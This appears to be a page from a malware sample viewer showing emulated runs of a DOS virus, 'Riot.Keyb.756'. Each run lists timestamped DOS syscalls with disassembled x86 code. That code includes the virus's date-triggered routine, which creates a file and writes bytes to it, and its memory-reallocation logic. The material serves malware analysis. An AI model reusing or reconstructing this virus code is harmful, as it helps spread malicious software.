Sample viewer

vx.netlux.org/Virus.DOS.Riot.Keyb.756

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:40.39795787Z 136 PC: 12a54 | UNKNOWN!
2018-12-17T22:57:40.399988433Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12aa4
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x386]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x386]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x2c
0x12a7f: int 0x21
0x12a81: cmp dl, 0x31
0x12a84: jb 0x12a97
0x12a86: mov ah, 0x40
0x12a88: mov cx, 0x51
0x12a8b: lea dx, word ptr [bp + 0x396]
0x12a8f: int 0x21
2018-12-17T22:57:40.402254023Z 60 PC: 12a7c | Create or truncate file
2018-12-17T22:57:40.750610006Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 0x31
0x12a84: jb 0x12a97
0x12a86: mov ah, 0x40
0x12a88: mov cx, 0x51
0x12a8b: lea dx, word ptr [bp + 0x396]
0x12a8f: int 0x21
0x12a91: mov ah, 0x3e
0x12a93: int 0x21
0x12a95: jmp 0x12afe
0x12a97: mov ah, 0x40
0x12a99: mov cx, 0x41
0x12a9c: lea dx, word ptr [bp + 0x345]
0x12aa0: int 0x21
0x12aa2: jmp 0x12a91
0x12aa4: mov ah, 0x4a
0x12aa6: mov bx, 0xffff
0x12aa9: int 0x21
0x12aab: sub bx, 0x31
0x12aae: mov ah, 0x4a
0x12ab0: int 0x21
2018-12-17T22:57:40.754902146Z 64 PC: 12a91 | Write file or device (Write 81 bytes on handle 5)
2018-12-17T22:57:40.758703582Z 62 PC: 12a95 | Close file

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12617,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:42.858473779Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:35:42.865662391Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12aa4
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x386]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x386]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x2c
0x12a7f: int 0x21
0x12a81: cmp dl, 0x31
0x12a84: jb 0x12a97
0x12a86: mov ah, 0x40
0x12a88: mov cx, 0x51
0x12a8b: lea dx, word ptr [bp + 0x396]
0x12a8f: int 0x21
2018-12-25T12:35:42.880007509Z 60 PC: 12a7c | Create or truncate file
2018-12-25T12:35:43.248609264Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 0x31
0x12a84: jb 0x12a97
0x12a86: mov ah, 0x40
0x12a88: mov cx, 0x51
0x12a8b: lea dx, word ptr [bp + 0x396]
0x12a8f: int 0x21
0x12a91: mov ah, 0x3e
0x12a93: int 0x21
0x12a95: jmp 0x12afe
0x12a97: mov ah, 0x40
0x12a99: mov cx, 0x41
0x12a9c: lea dx, word ptr [bp + 0x345]
0x12aa0: int 0x21
0x12aa2: jmp 0x12a91
0x12aa4: mov ah, 0x4a
0x12aa6: mov bx, 0xffff
0x12aa9: int 0x21
0x12aab: sub bx, 0x31
0x12aae: mov ah, 0x4a
0x12ab0: int 0x21
2018-12-25T12:35:43.252516942Z 64 PC: 12a91 | Write file or device (Write 81 bytes on handle 5)
2018-12-25T12:35:43.257413343Z 62 PC: 12a95 | Close file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12617,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:42.946850531Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:35:42.948958538Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
0x12a64: jne 0x12aa4
0x12a66: mov cx, 0xf
0x12a69: lea si, word ptr [bp + 0x386]
0x12a6d: inc byte ptr [si]
0x12a6f: inc si
0x12a70: loop 0x12a6d
0x12a72: mov ah, 0x3c
0x12a74: xor cx, cx
0x12a76: lea dx, word ptr [bp + 0x386]
0x12a7a: int 0x21
0x12a7c: xchg ax, bx
0x12a7d: mov ah, 0x2c
0x12a7f: int 0x21
0x12a81: cmp dl, 0x31
0x12a84: jb 0x12a97
0x12a86: mov ah, 0x40
0x12a88: mov cx, 0x51
0x12a8b: lea dx, word ptr [bp + 0x396]
0x12a8f: int 0x21
2018-12-25T12:35:42.951385887Z 74 PC: 12aab | Reallocate memory
2018-12-25T12:35:42.953611011Z 74 PC: 12ab2 | Reallocate memory
2018-12-25T12:35:42.955514978Z 72 PC: 12ab9 | Allocate memory